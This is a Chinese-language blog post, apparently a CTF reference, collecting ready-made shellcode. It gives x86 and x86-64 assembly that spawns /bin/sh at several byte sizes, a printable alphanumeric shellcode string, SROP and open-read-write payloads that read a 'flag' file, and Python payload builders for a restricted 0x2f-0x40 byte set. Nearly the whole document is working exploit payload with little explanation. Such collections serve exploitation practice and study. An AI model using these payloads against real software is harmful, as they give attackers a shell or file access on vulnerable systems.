常用shellcode总结

发表于 更新于 阅读次数:

32位

有”\x00”最短 20 byte

1
2
3
4
5
6
7
xor ecx,ecx               
mul ecx                   
mov al,0xb                
push 0x68732f             
push 0x6e69622f           
mov ebx,esp               
int 0x80

无”\x00”最短 21 byte

1
2
3
4
5
6
7
8
xor ecx,ecx
mul ecx
push eax
mov al,0xb
push 0x68732f2f   
push 0x6e69622f   
mov ebx,esp
int 0x80

标准shellcode 23 byte

1
2
3
4
5
6
7
8
9
xor ecx,ecx
xor edx,edx
push edx
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
xor eax,eax
mov al,0xB
int 0x80

64位

最短有”\x00” 22 byte

1
2
3
4
5
6
7
8
xor rsi,rsi
mul esi
mov rbx,0x68732f6e69622f
push rbx
push rsp
pop rdi
mov al, 59
syscall

最短无”\x00” 23 byte

1
2
3
4
5
6
7
8
9
xor rsi,rsi
mul esi
push rax
mov rbx,0x68732f2f6e69622f
push rbx
push rsp
pop rdi
mov al, 59
syscall

标准shellcode 31 byte

1
2
3
4
5
6
7
8
9
10
xor    rdi,rdi
xor    rsi,rsi
xor    rdx,rdx
xor    rax,rax
push   rax
mov rbx,0x68732f2f6e69622f
push   rbx
mov    rdi,rsp
mov    al,0x3b
syscall

可见字符

1
Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t

SROP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
shell1 = '''
xor rdi,rdi
mov rsi,%d
mov edx,0x1000

mov eax,0
syscall

jmp rsi
''' % addr
shell2 = '''
mov rax,0x67616c66
push rax

mov rdi,rsp
mov rsi,0
mov rdx,0
mov rax,2
syscall

mov rdi,rax
mov rsi,rsp
mov rdx,1024
mov rax,0
syscall

mov rdi,1
mov rsi,rsp
mov rdx,rax
mov rax,1
syscall

mov rdi,0
mov rax,60
syscall
'''

ORW

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
shell2 = '''
mov rax,0x67616c66
push rax

mov rdi,rsp
mov rsi,0
mov rdx,0
mov rax,2
syscall

mov rdi,rax
mov rsi,rsp
mov rdx,1024
mov rax,0
syscall

mov rdi,1
mov rsi,rsp
mov rdx,rax
mov rax,1
syscall

mov rdi,0
mov rax,60
syscall
'''

\x2f-\x40 read

需要从base_addr+3开始写入

1
2
3
4
5
6
base_addr = 0x33333000
payload = b'\x35'+p32(base_addr+0x35)+b'\x33\x30\x32\x30\x35'+p32(base_addr+0x35)+b'\x35'+p32(base_addr+0x31)+b'\x31\x30'
payload += b'\x3c\x3d'*0xa
payload += b'\x35' + p32(base_addr+0x31) # xor    eax,0x30303034
payload += p32(base_addr+0x53f)    # syscall data
payload += p32(base_addr+0x30)    # esi     data

\x2f-\x40 readv

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
base_addr = 0x33333000
payload = b''
payload += b'\x35'+p32(base_addr+0x334)+b'\x33\x30\x3c\x3d' # set esi
payload += b'\x35'+p32(base_addr+0x334)+b'\x35'+p32(base_addr+0x334)+b'\x31\x30\x3c\x3d' # xor addr+0x334
payload += b'\x35'+p32(base_addr+0x334)+b'\x35'+p32(base_addr+0x235)+b'\x32\x38'+b'\x35'+p32(base_addr+0x235)+b'\x35'+p32(base_addr+0x3f)+b'\x30\x38\x3c\x3d' # set bh 
payload += b'\x35'+p32(base_addr+0x3f)+b'\x35'+p32(base_addr+0x235)+b'\x32\x2f\x3c\x3d' # dl xor 0x40
payload += b'\x3c\x3d'*0x65
payload += b'\x35'+p32(base_addr+0x235)+b'\x35'+p32(base_addr+0x335)+b'\x32\x38'+b'\x35'+p32(base_addr+0x335)+b'\x35'+p32(base_addr+0x131)+b'\x30\x38\x3c\x3d' # set bh
payload += b'\x35'+p32(base_addr+0x131)+b'\x35'+p32(base_addr+0x236)+b'\x32\x2f\x3c\x3d' # dl xor 0x3f
payload += b'\x35'+p32(base_addr+0x236)+b'\x35'+p32(base_addr+0x33c)+b'\x31\x30\x3c\x3d' # xor addr+0x33c
payload += b'\x35'+p32(base_addr+0x33c)+b'\x35'+p32(base_addr+0x231)+b'\x31\x30\x3c\x3d' # gen syscall opcode
payload += b'\x35'+p32(base_addr+0x231)+b'\x35'+p32(base_addr+0x2f) +b'\x35'+p32(base_addr+0x3c)# set rax
payload += b'\x3c\x3d'*0x69
payload += b'\x3f\x36\x33\x33' # +0x231
payload += b'\x3f\x3e'
payload += b'\x3c\x3d'*0x7c
payload += b'\x30'
payload += p32(base_addr+0x233)+p32(base_addr+0x330)*3  # +0x330